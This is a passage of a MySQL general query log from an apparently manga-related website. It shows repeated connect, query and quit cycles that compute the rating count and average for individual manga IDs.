count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330640062 Quit 330640063 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330640063 Quit 330640064 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330640064 Quit 330640065 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330640065 Quit 330640066 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330640066 Quit 330640067 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330640067 Quit 330640068 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330640068 Quit 330640069 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330640069 Quit 330640070 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330640070 Quit 330640071 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330640071 Quit 330640072 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330640072 Quit 330640073 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330640073 Quit 330640074 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330640074 Quit 330640075 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330640075 Quit 330640076 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330640076 Quit 330640077 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330640077 Quit 330640078 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330640078 Quit 330640079 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330640079 Quit 330640080 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330640080 Quit 330640081 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330640081 Quit 330640082 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '95' order by created desc 330640082 Quit 330640083 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330640083 Quit 330640084 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330640084 Quit 330640085 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330640085 Quit 330640086 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330640086 Quit 330640087 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330640087 Quit 330640088 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330640088 Quit 330640089 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330640089 Quit 330640090 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330640090 Quit 330640091 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330640091 Quit 330640092 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330640092 Quit 330640093 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330640093 Quit 330640094 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330640094 Quit 330640095 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330640095 Quit 330640096 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330640096 Quit 330640097 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330640097 Quit 330640098 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330640098 Quit 330640099 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330640099 Quit 330640100 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330640100 Quit 330640101 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330640101 Quit 330640102 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '155' order by created desc 330640102 Quit 330640103 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330640103 Quit 330640104 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330640104 Quit 330640105 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330640105 Quit 330640106 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330640106 Quit 330640107 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330640107 Quit 330640108 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330640108 Quit 330640109 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330640109 Quit 330640110 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330640110 Quit 330640111 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330640111 Quit 330640112 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330640112 Quit 330640113 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330640113 Quit 330640114 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330640114 Quit 330640115 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330640115 Quit 330640116 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330640116 Quit 330640117 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330640117 Quit 330640118 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330640118 Quit 330640119 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330640119 Quit 330640120 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330640120 Quit 330640121 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330640121 Quit 330640122 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330640122 Quit 330640123 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330640123 Quit 330640124 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330640124 Quit 330640125 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330640125 Quit 330640126 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330640126 Quit 330640127 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330640127 Quit 330640128 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330640128 Quit 330640129 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330640129 Quit 330640130 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330640130 Quit 330640131 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '79' order by created desc 330640131 Quit 330640132 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330640132 Quit 330640133 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330640133 Quit 330640134 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330640134 Quit 330640135 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330640135 Quit 330640136 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330640136 Quit 330640137 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330640137 Quit 330640138 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330640138 Quit 330640139 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330640139 Quit 330640140 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330640140 Quit 330640141 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330640141 Quit 330640142 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330640142 Quit 330640143 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330640143 Quit 330640144 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330640144 Quit 330640145 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330640145 Quit 330640146 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330640146 Quit 330640147 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330640147 Quit 330640148 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330640148 Quit 330640149 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330640149 Quit 330640150 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330640150 Quit 330640151 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330640151 Quit 330640152 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330640152 Quit 330640153 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330640153 Quit 330640154 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330640154 Quit 330640155 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330640155 Quit 330640156 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330640156 Quit 330640157 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330640157 Quit 330640158 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330640158 Quit 330640159 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330640159 Quit 330640160 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330640160 Quit 330640161 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330640161 Quit 330640162 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330640162 Quit 330640163 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330640163 Quit 330640164 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330640164 Quit 330640165 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330640165 Quit 330640166 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330640166 Quit 330640167 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330640167 Quit 330640168 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330640168 Quit 330640169 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330640169 Quit 330640170 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330640170 Quit 330640171 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330640171 Quit 330640172 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330640172 Quit 330640173 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330640173 Quit 330640174 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330640174 Quit 330640175 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330640175 Quit 330640176 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330640176 Quit 330640177 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330640177 Quit 330640178 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330640178 Quit 330640179 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330640179 Quit 330640180 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330640180 Quit 330640181 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330640181 Quit 330640182 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330640182 Quit 330640183 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330640183 Quit 330640184 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330640184 Quit 330640185 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330640185 Quit 330640186 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330640186 Quit 330640187 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330640187 Quit 330640188 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330640188 Quit 330640189 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330640189 Quit 330640190 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330640190 Quit 330640191 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330640191 Quit 330640192 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330640192 Quit 330640193 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330640193 Quit 330640194 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330640194 Quit 330640195 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330640195 Quit 330640196 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '253' order by created desc 330640196 Quit 330640197 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330640197 Quit 330640198 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330640198 Quit 330640199 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330640199 Quit 330640200 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330640200 Quit 330640201 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330640201 Quit 330640202 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330640202 Quit 330640203 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330640203 Quit 330640204 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330640204 Quit 330640205 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330640205 Quit 330640206 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330640206 Quit 330640207 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330640207 Quit 330640208 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330640208 Quit 330640209 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330640209 Quit 330640210 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330640210 Quit 330640211 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330640211 Quit 330640212 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330640212 Quit 330640213 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330640213 Quit 330640214 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330640214 Quit 330640215 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640215 Query select count(id) as total_rating, (sum(rating) / count(id)) 